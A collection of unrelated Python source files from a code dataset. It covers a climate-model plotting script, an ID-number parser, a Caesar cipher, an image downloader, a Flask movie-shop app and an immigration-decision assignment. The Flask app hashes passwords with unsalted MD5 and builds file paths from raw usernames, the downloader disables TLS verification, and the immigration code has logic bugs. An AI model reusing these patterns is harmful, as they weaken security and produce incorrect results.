np.mean(np.mean(np.mean(np.squeeze(RH),0),0),0)\n#RH[~CaS]= np.mean(np.mean(np.mean(np.squeeze(RH),0),0),0)\n#CAPE= np.squeeze(CAPE)\n#RH= np.squeeze(RH)\n#CAPESmax= np.argmax(CAPE)\n\nCRM_path= '/data/dadm1/model_output/SPCAM/CPL64/'\nCRM_temp= '/data/dadm1/model_output/SPCAM/CPL64/CPL64.cam.h1.0001-01-01-00000.nc'\nwith Dataset(CRM_temp,'r') as D:\n lat=D.variables['LAT_15s_to_30n'][:]\n lon=D.variables['LON_60e_to_180e'][:]\n maxGY= lat.size\n maxGX= lon.size\n ilev = D.variables['ilev'][:]\n\ndp= np.diff(ilev)\ndp= dp[2:] # lowest 24 levels of GCM grid\ndp2 = dp.reshape((dp.size,1))\ndp2 = numpy.matlib.repmat(dp2,1,64)\n\n# large CCWa\nday1= 0; lat1= 10; lon1= 19;\n# small CCWa\nday2= 0; lat2= 1; lon2= 38;\nprint('S1: mean: '+str(CCWm[0,day1,lat1,lon1]))\nprint('S1: var: '+str(CCWv[0,day1,lat1,lon1]))\nprint('S1: agg: '+str(CCWa[0,day1,lat1,lon1]))\nprint('S1: CAPE: '+str(CAPE[0,day1,lat1,lon1]))\nprint('S1: RH: '+str(RH[0,day1,lat1,lon1]))\nprint('S1: MSE: '+str(MSE[0,day1,lat1,lon1]))\n\nprint('S2: mean: '+str(CCWm[0,day2,lat2,lon2]))\nprint('S2: var: '+str(CCWv[0,day2,lat2,lon2]))\nprint('S2: agg: '+str(CCWa[0,day2,lat2,lon2]))\nprint('S1: CAPE: '+str(CAPE[0,day2,lat2,lon2]))\nprint('S1: RH: '+str(RH[0,day2,lat2,lon2]))\nprint('S1: MSE: '+str(MSE[0,day2,lat2,lon2]))\n\n\nagg_min= np.nanmin(CCWa)\nagg_small= (CCWa== agg_min)\nM= CCWm[agg_small]\nV= CCWv[agg_small]\nMr= M.reshape((1,M.size))\nVr= V.reshape((1,V.size))\noMr= CCWm.reshape((1,CCWm.size))\noVr= CCWv.reshape((1,CCWv.size))\n\nCRM_file1= CRM_path+'CPL64.cam.h1.0006-01-'+str(day1+1).zfill(2)+'-00000.nc'\nCRM_file2= CRM_path+'CPL64.cam.h1.0006-01-'+str(day2+1).zfill(2)+'-00000.nc'\nwith Dataset(CRM_file1,'r') as D:\n qc= D.variables['CRM_QC_LON_60e_to_180e_LAT_15s_to_30n'][:,:,0,:,lat1,lon1]\n qc= np.squeeze(np.mean(qc,0))\n qc= qc * dp2 / np.sum(dp)\n hm1= np.sum(qc,0)\n ind1q= hm1.argsort()[-6:][::-1]\n W= D.variables['CRM_W_LON_60e_to_180e_LAT_15s_to_30n'][:,16,0,:,lat1,lon2]\n W1= 
np.squeeze(np.mean(W,0))\n ind1W= W1.argsort()[-6:][::-1]\n\nwith Dataset(CRM_file2,'r') as D:\n qc= D.variables['CRM_QC_LON_60e_to_180e_LAT_15s_to_30n'][:,:,0,:,lat2,lon2]\n W= D.variables['CRM_W_LON_60e_to_180e_LAT_15s_to_30n'][:,16,0,:,lat2,lon2]\n qc= np.squeeze(np.mean(qc,0))\n W2= np.squeeze(np.mean(W,0))\n qc= qc * dp2 / np.sum(dp)\n hm2= np.sum(qc,0)\n ind2q= hm2.argsort()[-6:][::-1]\n ind2W= W2.argsort()[-6:][::-1]\n\nplt.figure(figsize=(7,3))\nplt.plot(np.arange(1,65), hm1, color='r')\nplt.plot(ind1q+1, hm1[ind1q], 'ro', linestyle='')\nplt.plot(np.arange(1,65), hm2, color='b')\nplt.plot(ind2q+1, hm2[ind2q], 'bo', linestyle='')\nplt.xlim(1, 64)\npicsave= '/data/cloud/Goldtimes5/pic/SPCAM/Snapshot/Large_Small_agg.png'\nplt.savefig(picsave)\nplt.show()\n\nplt.figure(figsize=(7,3))\nplt.plot(np.arange(1,65), W1, color='r')\nplt.plot(ind1W+1, W1[ind1W], 'ro', linestyle='')\nplt.plot(np.arange(1,65), W2, color='b')\nplt.plot(ind2W+1, W2[ind2W], 'bo', linestyle='')\nplt.xlim(1, 64)\npicsave= '/data/cloud/Goldtimes5/pic/SPCAM/Snapshot/Large_Small_agg_W.png'\nplt.savefig(picsave)\nplt.show()\n\n\n","sub_path":"Goldtimes5/GCM_SPCAM/plot/unmodified/plot_CRM_profile.py","file_name":"plot_CRM_profile.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"426148893","text":"__author__ = 'Administrator'\n\ndef checkPID(pid):\n if len(pid) == 18:\n print(\"your pid is : \"+pid)\n else:\n print(\"your pid length is incorrect\")\n\n ID_add = pid[0:6]\n ID_birth = pid[6:14]\n ID_sex = pid[14:17]\n ID_check = pid[17]\n\n #ID_add是身份证中的区域代码,如果有一个行政区划代码字典,就可以用获取大致地址#\n\n year = ID_birth[0:4]\n moon = ID_birth[4:6]\n day = ID_birth[6:8]\n print(\"Birthday: \",year+'-'+moon+'-'+day)\n\n if int(ID_sex) % 2 == 0:\n print('Gender : Female')\n else:\n print('Gender : Male')\n\nif __name__ == '__main__':\n while True:\n PID = input('Please input your personal id. 
\\n ')\r\n checkPID(PID)\r\n if PID == 'q':\r\n break","sub_path":"src/fundamental/basic/checkPersonalID.py","file_name":"checkPersonalID.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"647803976","text":"message = input(\"Enter a message: \")\nshift = int(input(\"Enter a number to shift by (0-25): \"))\nprint(\"Encrypting message....\")\nlist1 = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\",\n \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n\nencrypted = ''\nfor symbol in message:\n if symbol in list1:\n num = (list1.index(symbol) + shift) % 26\n encrypted = encrypted + list1[num]\n else:\n encrypted = encrypted + symbol\n\nprint(\"Encrypted message:\", encrypted)\n\nprint(\"Decrypting message....\")\ndecrypted = ''\nfor symbol in encrypted:\n if symbol in list1:\n num = (list1.index(symbol) - shift) % 26\n decrypted = decrypted + list1[num]\n else:\n decrypted = decrypted + symbol\n\nprint(\"Decrypted message:\", decrypted)\nprint(\"Original message:\", message)\n","sub_path":"files/ITP_a4_Lord_Alec/ITP_a4_Lord_Alec.py","file_name":"ITP_a4_Lord_Alec.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"79288681","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on 2019/1/28 20:46\r\n\r\n@author: li\r\n\"\"\"\r\n\r\nimport requests\r\nimport json\r\nimport time\r\nfrom contextlib import closing\r\n\r\n\r\nclass GetPhotos(object):\r\n def __init__(self):\r\n self.photos_id = []\r\n self.download_sever = 'https://unsplash.com/photos/xxx/download?force=true'\r\n self.download_target = 'https://unsplash.com/napi/collections/3356568/photos?page=1&per_page=20&order_by=latest'\r\n\r\n def get_id(self):\r\n req = requests.get(url=self.download_target, verify=False)\r\n html = json.loads(req.text)\r\n for each in html:\r\n self.photos_id.append(each['id'])\r\n time.sleep(1)\r\n\r\n def download(self, photo_id, filename):\r\n target = self.download_sever.replace('xxx', photo_id)\r\n with closing(requests.get(url=target, stream=True, verify=False)) as r:\r\n with open('%d.jpg' % filename, 'ab+') as f:\r\n for chunk in r.iter_content(chunk_size=1024):\r\n if chunk:\r\n f.write(chunk)\r\n f.flush()\r\n\r\n\r\nif __name__ == '__main__':\r\n gp = GetPhotos()\r\n print('获取图片链接中:')\r\n gp.get_id()\r\n print('图片下载中:')\r\n for i in range(len(gp.photos_id)):\r\n print('正在下载第%d张图片' % (i + 1))\r\n gp.download(gp.photos_id[i], i + 1)\r\n\r\n\r\n# if __name__ == '__main__':\r\n# target = 'https://unsplash.com/napi/collections/3356568/photos?page=1&per_page=20&order_by=latest'\r\n# req = requests.get(url=target, verify=False)\r\n# html = json.loads(req.text)\r\n# print(html[0])\r\n# print(html[0]['links']['download_location'])\r\n","sub_path":"spyder_photos.py","file_name":"spyder_photos.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208957926","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nimport logging\nimport os\n\nfrom celery import Celery, Task\n\nfrom django.conf import settings\n\n_logger = logging.getLogger(\"polyaxon.tasks\")\n\n\nclass PolyaxonTask(Task):\n abstract = True\n\n def on_success(self, retval, task_id, args, kwargs):\n _logger.info(\"Celery task succeeded\", extra={'task name': self.name})\n\n def on_failure(self, exc, task_id, args, kwargs, einfo):\n extra = {\n 'task name': self.name,\n 'task id': task_id,\n 'task args': args,\n 'task kwargs': kwargs,\n }\n _logger.error(\"Celery Task 
Failed\", exc_info=einfo, extra=extra)\n\n def on_retry(self, exc, task_id, args, kwargs, einfo):\n _logger.info(\"Celery task retry\", extra={'task name': self.name})\n\n\n# set the default Django settings module for the 'celery' program.\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api.settings')\n\napp = Celery('api')\n\napp.Task = PolyaxonTask # Custom base class for logging\n\n# Using a string here means the worker don't have to serialize\n# the configuration object to child processes.\napp.config_from_object('django.conf:settings')\n\n# Load task modules from all registered Django app configs.\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n","sub_path":"api/api/celery_api.py","file_name":"celery_api.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"527144484","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom app import app\nfrom flask import render_template, request, url_for, redirect, session, make_response, Flask, jsonify, request\nimport json\nimport os\nimport sys\nimport hashlib\nfrom random import randrange\nfrom flask import flash\nimport ast\nfrom datetime import date\nimport random \n\n\n@app.route('/', methods=['POST', 'GET', 'PUT'])\n@app.route('/index', methods=['POST', 'GET', 'PUT'])\ndef index():\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n\n if request.method == 'POST':\n if 'Busqueda' in request.form:\n pelicula = request.form['Busqueda']\n movies = []\n for x in catalogue['peliculas']:\n if pelicula.lower() in x['titulo'].lower():\n movies.append(x)\n if not movies:\n flash('La búsqueda \"' + pelicula + '\" no ha producido resultados. 
Por favor, realiza otra búsqueda')\n return render_template('index.html', title=\"Home\", movies=catalogue['peliculas'], session=session)\n return render_template('index.html', title=\"Home\", movies=movies, session=session)\n elif 'Filtrado' in request.form:\n pelicula = request.form['Filtrado']\n if pelicula == 'Filtrar por':\n flash('Introduce un filtro válido')\n return render_template('index.html', title=\"Home\", movies=catalogue['peliculas'], session=session)\n movies = []\n for x in catalogue['peliculas']:\n if pelicula.lower() in x['genero'].lower():\n movies.append(x)\n return render_template('index.html', title=\"Home\", movies=movies, session=session)\n\n return render_template('index.html', title=\"Home\", movies=catalogue['peliculas'], session=session)\n\n\n\n@app.route('/')\ndef detalle(titulo):\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n movies = catalogue['peliculas']\n pelicula = next((item for item in movies if item[\"titulo\"] == titulo), False)\n \n if 'logged_in' in session:\n if pelicula:\n historial_dir = open(os.path.join(app.root_path, 'usuarios',\n session['usuario'], 'historial.json'), encoding=\"utf-8\").read()\n compradas = []\n historial = json.loads(historial_dir)\n datosHistorial = historial['historial']\n for x in datosHistorial:\n for y in x['peliculas']:\n compradas.append(int(y))\n if int(pelicula['id']) in compradas:\n return render_template('detail.html', coleccion='true', selection=pelicula)\n \n return render_template('detail.html', selection=pelicula)\n\n\n@app.route('/sesion')\ndef sesion():\n last_user = request.cookies.get('username')\n if last_user:\n return render_template('sesion.html', title=\"Sesion\", last_user=last_user)\n return render_template('sesion.html', title=\"Sesion\")\n\n\n@app.route('/registrar', methods=['GET', 'POST'])\ndef registrar():\n if request.method == \"POST\":\n usuario = {\"username\": request.form['usuario'],\n \"password\": hashlib.md5(request.form['password'].encode('utf-8')).hexdigest(),\n \"email\": request.form['email'],\n \"genero\": request.form['genero'],\n \"edad\": request.form['edad'],\n \"tarjeta\": request.form['tarjeta'],\n \"saldo\": randrange(101),\n \"nPedidos\": 0}\n\n directorio = os.path.join(\n app.root_path, 'usuarios', request.form['usuario'])\n try:\n os.makedirs(directorio)\n except OSError:\n flash('¡El usuario ya existe!')\n return redirect(url_for('sesion'))\n\n directorio = os.path.join(\n app.root_path, 'usuarios', request.form['usuario'], 'datos.dat')\n data_file = open(directorio, \"w\")\n data_file.write(str(usuario))\n data_file.close()\n\n directorio = os.path.join(\n app.root_path, 'usuarios', request.form['usuario'], 'historial.json')\n historial = open(directorio, \"w\")\n json.dump({\n \"historial\": []\n }, historial)\n historial.close()\n \n \n session['logged_in'] = True\n session['usuario'] = usuario['username']\n session[\"saldo\"] = usuario['saldo']\n session.modified = True\n\n resp = make_response(redirect(url_for('index')))\n resp.set_cookie('username', usuario['username'])\n return resp\n\n return redirect(url_for('index'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == \"POST\":\n usuario = request.form['usuario']\n password = hashlib.md5(\n request.form['password'].encode('utf-8')).hexdigest()\n\n directorio = os.path.join(\n app.root_path, 'usuarios', usuario, 'datos.dat')\n try:\n with open(directorio, \"r\") as 
data_file:\n data_dictionary = ast.literal_eval(data_file.read())\n except IOError:\n flash('¡El usuario no existe!')\n flash('Puedes registrarte en esta misma página.')\n return redirect(url_for('sesion'))\n\n if(password != data_dictionary.get('password')):\n flash('¡Contraseña errónea!')\n return redirect(url_for('sesion'))\n\n session['logged_in'] = True\n session['usuario'] = request.form['usuario']\n session[\"saldo\"] = data_dictionary[\"saldo\"]\n session.modified = True\n\n resp = make_response(redirect(url_for('index')))\n resp.set_cookie('username', usuario)\n return resp\n else:\n flash('Error en el login, pruebe otra vez.')\n return redirect(url_for('sesion'))\n\n\n@app.route('/logout/')\ndef logout(user):\n if 'logged_in' in session:\n session.pop('usuario', None)\n session.pop('logged_in', None)\n session.modified = True\n else:\n flash('Hubo un error al cerrar sesión')\n\n return redirect(url_for('index'))\n\n\n@app.route(\"/carrito\")\ndef carrito():\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n\n ids_in_cart = session.get('cart', [])\n movies = []\n precio = 0\n\n for x in catalogue['peliculas']:\n if x['id'] in ids_in_cart:\n movies.append(x)\n precio += x['precio']\n session['total'] = precio\n session.modified = True\n\n return render_template(\"carrito.html\", movies=movies, precio=precio)\n\n\n@app.route(\"/pedidos\")\ndef pedidos():\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n\n if 'logged_in' in session:\n historial_dir = open(os.path.join(app.root_path, 'usuarios',\n session['usuario'], 'historial.json'), encoding=\"utf-8\").read()\n historial = json.loads(historial_dir)\n datosHistorial = historial['historial']\n\n return render_template(\"pedidos.html\", datosHistorial=datosHistorial, movies=catalogue['peliculas'])\n redirect(url_for('index'))\n \n \n@app.route(\"/coleccion\")\ndef coleccion():\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n if 'logged_in' in session:\n historial_dir = open(os.path.join(app.root_path, 'usuarios',\n session['usuario'], 'historial.json'), encoding=\"utf-8\").read()\n movies = []\n historial = json.loads(historial_dir)\n datosHistorial = historial['historial']\n for x in datosHistorial:\n for y in x['peliculas']:\n for z in catalogue['peliculas']:\n if y == z['id']:\n movies.append(z)\n\n return render_template(\"coleccion.html\", movies=movies)\n redirect(url_for('carrito'))\n\n\n@app.route(\"/add_to_cart/\")\ndef add_to_cart(id):\n if 'cart' not in session:\n session['cart'] = []\n\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n if int(id) in session['cart']:\n flash('Este artículo ya está en el carrito')\n for x in catalogue['peliculas']:\n if x['id'] == int(id):\n return redirect(\"/\" + x['titulo'])\n session['cart'].append(int(id))\n\n flash('Elemento añadido al carrito')\n\n\n return redirect(url_for('carrito'))\n\n\n@app.route('/borrarCarrito')\ndef borrarCarrito():\n session.pop('cart', None)\n session.modified = True\n\n return redirect(url_for('carrito'))\n\n\n@app.route('/borrarElemento/')\ndef borrarElemento(id):\n session['cart'].remove(int(id))\n session.modified = True\n\n return 
redirect(url_for('carrito'))\n\n\n@app.route('/comprarCarrito')\ndef comprarCarrito():\n    if 'logged_in' in session:\n        directorio = os.path.join(\n            app.root_path, 'usuarios', session['usuario'], 'datos.dat')\n        try:\n            with open(directorio, \"r\") as data_file:\n                data_dictionary = ast.literal_eval(data_file.read())\n        except IOError:\n            flash('¡El usuario no existe!')\n        saldo = data_dictionary.get('saldo')\n        if saldo >= session['total']:\n            catalogue_data = open(os.path.join(\n                app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n            catalogue = json.loads(catalogue_data)\n\n            ids_in_cart = session.get('cart', [])\n\n            historial_data = open(os.path.join(\n                app.root_path, 'usuarios', session['usuario'], 'historial.json'), encoding=\"utf-8\").read()\n            historial = json.loads(historial_data)\n            datosHistorial = historial['historial']\n            id = data_dictionary.get('nPedidos')\n            data = {\n                \"id\": id,\n                \"fecha\": str(date.today()),\n                \"precio\": session['total'],\n                \"peliculas\": ids_in_cart\n            }\n            datosHistorial.append(data)\n\n            directorioHistorial = os.path.join(\n                app.root_path, 'usuarios', session['usuario'], 'historial.json')\n            file = open(directorioHistorial, \"w\")\n            json.dump({\n                \"historial\": datosHistorial}, file)\n            file.close()\n            session.pop('cart', None)\n            session.modified = True\n            data_dictionary[\"saldo\"] -= session['total']\n            data_dictionary[\"nPedidos\"] += 1\n\n            directorio_datos = os.path.join(\n                app.root_path, 'usuarios', session['usuario'], 'datos.dat')\n            datos_file = open(directorio_datos, \"w\")\n            datos_file.write(str(data_dictionary))\n            datos_file.close()\n            session[\"saldo\"] = data_dictionary[\"saldo\"]\n\n            flash('¡Carrito comprado!')\n            return redirect(url_for('carrito'))\n        else:\n            flash('No tienes suficiente saldo. Haz click en saldo (barra lateral) para añadir más')\n            return redirect(url_for('carrito'))\n    else:\n        flash('¡Para comprar debes estar logueado!')\n        return redirect(url_for('sesion'))\n\n\n@app.route('/comprarElemento/<id>')\ndef comprarElemento(id):\n    if 'logged_in' in session:\n        directorio = os.path.join(\n            app.root_path, 'usuarios', session['usuario'], 'datos.dat')\n        try:\n            with open(directorio, \"r\") as data_file:\n                data_dictionary = ast.literal_eval(data_file.read())\n        except IOError:\n            flash('¡El usuario no existe!')\n        catalogue_data = open(os.path.join(\n            app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n        catalogue = json.loads(catalogue_data)\n        for x in catalogue['peliculas']:\n            if x['id'] == int(id):\n                pelicula = x\n        saldo = data_dictionary.get('saldo')\n        if saldo >= pelicula['precio']:\n\n            ids_in_cart = [int(id)]\n\n            historial_data = open(os.path.join(\n                app.root_path, 'usuarios', session['usuario'], 'historial.json'), encoding=\"utf-8\").read()\n            historial = json.loads(historial_data)\n            datosHistorial = historial['historial']\n            idPedido = data_dictionary.get('nPedidos')\n            data = {\n                \"id\": idPedido,\n                \"fecha\": str(date.today()),\n                \"precio\": pelicula['precio'],\n                \"peliculas\": ids_in_cart\n            }\n            datosHistorial.append(data)\n\n            directorioHistorial = os.path.join(\n                app.root_path, 'usuarios', session['usuario'], 'historial.json')\n            file = open(directorioHistorial, \"w\")\n            json.dump({\n                \"historial\": datosHistorial}, file)\n            file.close()\n            session['cart'].remove(int(id))\n            session.modified = True\n            data_dictionary[\"saldo\"] -= pelicula['precio']\n            session['total'] -= pelicula['precio']\n            data_dictionary[\"nPedidos\"] += 1\n\n            directorio_datos = os.path.join(\n                app.root_path, 'usuarios', session['usuario'], 'datos.dat')\n            
datos_file = open(directorio_datos, \"w\")\n datos_file.write(str(data_dictionary))\n datos_file.close()\n session[\"saldo\"] = data_dictionary[\"saldo\"]\n\n flash('¡Articulo comprado!')\n return redirect(url_for('carrito'))\n else:\n flash('No tienes suficiente saldo. Haz click en saldo (navegador) para añadir más')\n return redirect(url_for('carrito'))\n else:\n flash('¡Para comprar debes estar logueado!')\n return redirect(url_for('sesion'))\n\n\n@app.route('/saldo')\ndef saldo():\n return render_template(\"saldo.html\", title=\"Saldo\", session=session)\n\n\n@app.route('/aumentarSaldo', methods=['GET', 'POST'])\ndef aumentarSaldo():\n if request.method == \"POST\":\n aumento = int(request.form['cantidad'])\n\n directorio = os.path.join(\n app.root_path, 'usuarios', session['usuario'], 'datos.dat')\n try:\n with open(directorio, \"r+\") as data_file:\n data_dictionary = ast.literal_eval(data_file.read())\n saldo = data_dictionary.get('saldo')\n saldo += aumento\n data_dictionary['saldo'] = saldo\n data_file.seek(0)\n data_file.write(str(data_dictionary))\n data_file.truncate()\n except IOError:\n flash('¡El usuario no existe!')\n return redirect(url_for('saldo'))\n\n session[\"saldo\"] += aumento\n session.modified = True\n flash('¡Saldo aumentado!')\n return redirect(url_for('index'))\n else:\n flash('Error al incrementar saldo, pruebe otra vez.')\n return redirect(url_for('saldo'))\n\n\n@app.route('/connectedUsers')\ndef connectedUsers():\n return jsonify(result = random.randrange(150,200))\n\n","sub_path":"public_html/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":15421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"198740514","text":"#!/usr/bin/env python3\n\n\"\"\" Computer-based immigration office for Kanadia \"\"\"\n\n__author__ = 'Susan Sim, Xiwen Zhou, Alex Goel'\n__email__ = \"ses@drsusansim.org, xw.zhou@mail.utoronto.ca, alex.goel@mail.utoronto.ca\"\n\n__copyright__ = \"2014 Susan Sim, Xiwen Zhou, Alex Goel\"\n__license__ = \"MIT License\"\n\n__status__ = \"Prototype\"\n\n# imports one per line\nimport re\nimport datetime\nimport json\n\n\ndef check_valid(entries_content_list, index):\n \"\"\"(list,int)-> str\n Check if all the must have information is included\n Check if passport number and birth date is in right format\n Return reject if not included or right\n :param entries_content_list: List that loaded from a JSON formatted\n file that contains cases to decide\n :param index: Index for looping through all entries\n :return: Strings. 
Possible values of string is:\"Reject\"\n \"\"\"\n try:\n if not valid_passport_format(entries_content_list[index][\"passport\"]):\n return \"Reject\"\n if not valid_date_format(entries_content_list[index][\"birth_date\"]):\n return \"Reject\"\n entries_content_list[index][\"home\"][\"city\"]\n entries_content_list[index][\"home\"][\"region\"]\n entries_content_list[index][\"home\"][\"country\"]\n entries_content_list[index][\"from\"][\"city\"]\n entries_content_list[index][\"from\"][\"region\"]\n entries_content_list[index][\"from\"][\"country\"]\n entries_content_list[index][\"first_name\"]\n entries_content_list[index][\"last_name\"]\n entries_content_list[index][\"entry_reason\"]\n #check for must-contain information\n except KeyError:\n return \"Reject\"\n\n\ndef watch_list(entries_content_list, watchlist_contents_list, index):\n \"\"\"(list,list,int)-> str\n Checks if a person trying to enter the country is on the watchlist\n :param entries_content_list: List that loaded from a JSON\n formatted file that contains cases to decide\n :param watchlist_contents_list: List that loaded from a\n JSON formatted file that contains\n names and passport numbers on a watchlist\n :param index: Index for looping through all entries\n :return: Strings. Possible values of string is:\"Secondary\"\n \"\"\"\n each_entries_content = entries_content_list[index]\n for each_watchlist in watchlist_contents_list:\n if each_entries_content['passport'].upper()\\\n == each_watchlist[\"passport\"].upper():\n return \"Secondary\"\n #Check if entry's passport number is in watchlist\n elif each_entries_content['first_name'].upper()\\\n == each_watchlist[\"first_name\"].upper()and\\\n each_entries_content['last_name'].upper()\\\n == each_watchlist[\"last_name\"].upper():\n #Check if entry's first name and last name are both in watchlist\n return \"Secondary\"\n else:\n return None\n\n\ndef medical_advisory(entries_content_list, countries_contents_dic, index):\n \"\"\"(list,dict,int)-> str\n Checks if a person trying to enter the country has come\n from or via a country that requires medical advisory.\n :param entries_content_list: List that loaded from a\n JSON formatted file that contains cases to decide\n :param countries_contents_dic: Dictionary that loaded from a JSON\n formatted file that contains countries entry requirement information\n :param index: Index for looping through all entries\n :return: Strings. Possible values of strings are:\"Reject\",\"Quarantine\"\n \"\"\"\n\n each_entry = entries_content_list[index]\n try:\n if countries_contents_dic[each_entry[\"from\"][\"country\"].upper()]\\\n [\"medical_advisory\"] != \"\":\n return \"Quarantine\"\n except KeyError:\n return \"Reject\"\n try:\n if countries_contents_dic[each_entry[\"via\"][\"country\"].upper()]\\\n [\"medical_advisory\"] != \"\":\n return \"Quarantine\"\n #Check via country information. As via is not a must-have information,\n # can't return reject if not found\n except KeyError:\n return None\n\n\ndef returning_residents(entries_content_list, index):\n \"\"\"(list,int)-> str\n Checks if a person is a KAN resident returning home country.\n :param entries_content_list: List that loaded from a\n JSON formatted file that contains cases to decide\n :param index: Index for looping through all entries\n :return: Strings. 
Possible values of string is:\"Accept\"\n \"\"\"\n\n each_entry = entries_content_list[index]\n if each_entry[\"entry_reason\"] == \"returning\" and\\\n each_entry[\"home\"][\"country\"].upper() == \"KAN\":\n return \"Accept\"\n\n\ndef visit_visa(entries_content_list, countries_contents_dic, index):\n \"\"\"(list,dict,int)-> str\n Checks if a person entering a certain country as a\n visitor will be asked for a visit visa\n :param entries_content_list: List that loaded from a JSON\n formatted file that contains cases to decide\n :param countries_contents_dic: Dictionary that loaded from a\n JSON formatted file that contains\n countries entry requirement information\n :param index: Index for looping through all entries\n :return: Strings. Possible values of strings are:\"Accept\",\"Reject\"\n \"\"\"\n\n each_entry = entries_content_list[index]\n if each_entry[\"entry_reason\"] == \"visit\":\n if countries_contents_dic[each_entry[\"from\"][\"country\"].upper()]\\\n [\"visitor_visa_required\"] == \"1\":\n try:\n issue_date = each_entry[\"visa\"][\"date\"]\n today = datetime.date.today()\n year = int(issue_date[0:4])\n month = int(issue_date[5:7])\n day = int(issue_date[9:11])\n margin = datetime.timedelta(days=730)\n #Check if issue date is within 730 days from now\n if today-margin <= datetime.date(year, month, day):\n visa_format = re.compile('^\\w{5}-\\w{5}$')\n #Check if visa code is in right format\n if visa_format.match(each_entry[\"visa\"][\"code\"]):\n return \"Accept\"\n else:\n return \"Reject\"\n except KeyError:\n #check if the entry has a visa\n return \"Reject\"\n else:\n return None\n\n\ndef transit_visa(entries_content_list, countries_contents_dic, index):\n \"\"\"(list,dict,int)-> str\n Checks if a person entering a certain country\n as a visitor will be asked for a transit visa\n :param entries_content_list: List that loaded from a\n JSON formatted file that contains cases to decide\n :param countries_contents_dic: Dictionary that\n loaded from a JSON formatted file that contains\n countries entry requirement information\n :param index: Index for looping through all entries\n :return: Strings; Possible values of strings are:\"Accept\",\"Reject\"\n \"\"\"\n\n each_entry = entries_content_list[index]\n if each_entry[\"entry_reason\"] == \"transit\":\n if countries_contents_dic[each_entry[\"from\"][\"country\"].upper()]\\\n [\"transit_visa_required\"] == \"1\":\n try:\n issue_date = each_entry[\"visa\"][\"date\"]\n today = datetime.date.today()\n year = int(issue_date[0:4])\n month = int(issue_date[5:7])\n day = int(issue_date[9:11])\n margin = datetime.timedelta(days=730)\n #Check if issue date is within 730 days from now\n if today-margin <= datetime.date(year, month, day):\n visa_format = re.compile('^\\w{5}-\\w{5}$')\n #Check if visa code is in right format\n if visa_format.match(each_entry[\"visa\"][\"code\"]):\n return \"Accept\"\n else:\n return \"Reject\"\n except KeyError:\n #check if the entry has a visa\n return \"Reject\"\n else:\n return None\n\n\ndef decide(input_file, watchlist_file, countries_file):\n \"\"\"(json,json,json)->str\n Decides whether a traveller's entry into Kanadia should be accepted\n :param input_file: The name of a JSON formatted\n file that contains cases to decide\n :param watchlist_file: The name of a JSON formatted\n file that contains names and passport numbers on a watchlist\n :param countries_file: The name of a JSON formatted\n file that contains country data, such as whether\n an entry or transit visa is required, and whether\n there is 
currently a medical advisory\n    :return: List of strings; Possible values of strings are:\n             \"Accept\", \"Reject\", \"Secondary\", and \"Quarantine\"\n    \"\"\"\n\n    try:\n        with open(input_file, \"r\") as entries:\n            entries_content = entries.read()\n            entries_content_list = json.loads(entries_content)\n            entries.close()\n        \n        with open(watchlist_file,\"r\") as watchlist:\n            watchlist_contents = watchlist.read()\n            watchlist_contents_list = json.loads(watchlist_contents)\n            watchlist.close()\n        \n        with open(countries_file, \"r\") as countries:\n            countries_contents = countries.read()\n            countries_contents_dic = json.loads(countries_contents)\n            countries.close()\n    except:\n        raise FileNotFoundError\n        #in case file not found\n    else:\n        decision_list = []\n        for index in range(0, len(entries_content_list)):\n            if medical_advisory(entries_content_list, countries_contents_dic, index)\\\n                    == \"Quarantine\":\n                decision = \"Quarantine\"\n            elif check_valid(entries_content_list,index) == \"Reject\":\n                decision = \"Reject\"\n            elif visit_visa(entries_content_list, countries_contents_dic, index)\\\n                    == \"Reject\":\n                decision = \"Reject\"\n            elif transit_visa(entries_content_list, countries_contents_dic, index)\\\n                    == \"Reject\":\n                decision = \"Reject\"\n            elif watch_list(entries_content_list, watchlist_contents_list, index)\\\n                    == \"Secondary\":\n                decision = \"Secondary\"\n            elif returning_residents(entries_content_list, index) == \"Accept\":\n                decision = \"Accept\"\n            else:\n                decision = \"Accept\"\n            decision_list.append(decision)\n        return decision_list\n        #decide according to quarantine,reject,secondary,accept priority sequence\n\n\ndef 